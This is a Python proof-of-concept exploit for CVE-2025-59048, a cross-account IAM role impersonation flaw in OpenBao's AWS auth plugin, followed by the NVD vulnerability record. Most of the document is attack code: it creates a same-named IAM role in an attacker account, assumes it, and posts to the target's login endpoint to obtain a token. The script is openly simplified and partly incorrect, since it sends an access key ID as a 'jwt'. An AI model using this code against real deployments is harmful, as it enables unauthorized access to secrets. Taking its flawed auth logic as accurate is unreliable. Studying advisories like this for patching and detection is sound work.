CVE-2025-59048

# CVE-2025-59048 PoC - Cross-account IAM Role Impersonation # This PoC demonstrates the concept of the vulnerability import boto3 import json import requests # Configuration OPENBAO_URL = "http://target-openbao:8200" ATTACKER_AWS_ACCOUNT_ID = "123456789012" # Attacker's AWS account TARGET_ROLE_NAME = "trusted-role" # Same name as role in trusted account def create_iam_role_in_attacker_account(): """Create an IAM role with the same name as the target role""" iam_client = boto3.client('iam') trust_policy = { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:root" }, "Action": "sts:AssumeRole" } ] } try: iam_client.create_role( RoleName=TARGET_ROLE_NAME, AssumeRolePolicyDocument=json.dumps(trust_policy), Description="Malicious role for CVE-2025-59048 demonstration" ) print(f"[+] Created IAM role: {TARGET_ROLE_NAME}") except iam_client.exceptions.EntityAlreadyExistsException: print(f"[*] Role {TARGET_ROLE_NAME} already exists") def get_aws_identity(): """Get current AWS identity credentials""" sts_client = boto3.client('sts') identity = sts_client.get_caller_identity() return identity def authenticate_to_openbao(): """Attempt to authenticate to OpenBao using the impersonated role""" # Assume role to get temporary credentials sts_client = boto3.client('sts') # Get role credentials (would normally require assuming the role first) role_credentials = sts_client.assume_role( RoleArn=f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:role/{TARGET_ROLE_NAME}", RoleSessionName="OpenBao-Exploitation" ) # Generate signed request to OpenBao # The vulnerability allows this request from untrusted account to succeed auth_data = { "role": TARGET_ROLE_NAME, "jwt": role_credentials['Credentials']['AccessKeyId'] # Simplified } response = requests.post( f"{OPENBAO_URL}/v1/auth/aws/login", json=auth_data ) if response.status_code == 200: print("[!] Authentication successful - Vulnerability confirmed!") return response.json() else: print("[-] Authentication failed") return None def main(): print("CVE-2025-59048 - OpenBao AWS Plugin Cross-account IAM Role Impersonation") print("=" * 80) # Step 1: Create role in attacker's account create_iam_role_in_attacker_account() # Step 2: Verify current identity identity = get_aws_identity() print(f"[*] Current identity: {identity['Arn']}") # Step 3: Attempt authentication to OpenBao result = authenticate_to_openbao() if result: print("[+] Received OpenBao token - exploitation successful") print(f" Token: {result.get('auth', {}).get('client_token', 'N/A')[:20]}...") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-59048", "sourceIdentifier": "[email protected]", "published": "2025-10-23T16:16:43.190", "lastModified": "2025-12-05T00:33:07.590", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBao's AWS Plugin generates AWS access credentials based on IAM policies. Prior to version 0.1.1, the AWS Plugin is vulnerable to cross-account IAM role Impersonation in the AWS auth method. The vulnerability allows an IAM role from an untrusted AWS account to authenticate by impersonating a role with the same name in a trusted account, leading to unauthorized access. This impacts all users of the auth-aws plugin who operate in a multi-account AWS environment where IAM role names may not be unique across accounts. This vulnerability has been patched in version 0.1.1 of the auth-aws plugin. A workaround for this issue involves guaranteeing that IAM role names are unique across all AWS accounts that could potentially interact with your OpenBao environment, and to audit for any duplicate IAM roles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-694"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbao:aws_plugin:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.1.1", "matchCriteriaId": "F8269CFF-93B8-4FF9-B905-D69E7A7F4934"}]}]}], "references": [{"url": "https://github.com/openbao/openbao-plugins/commit/2a77af36834746ca6d3ac9bd1049154c84b3efae", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openbao/openbao-plugins/security/advisories/GHSA-jp7h-4f3c-9rc7", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}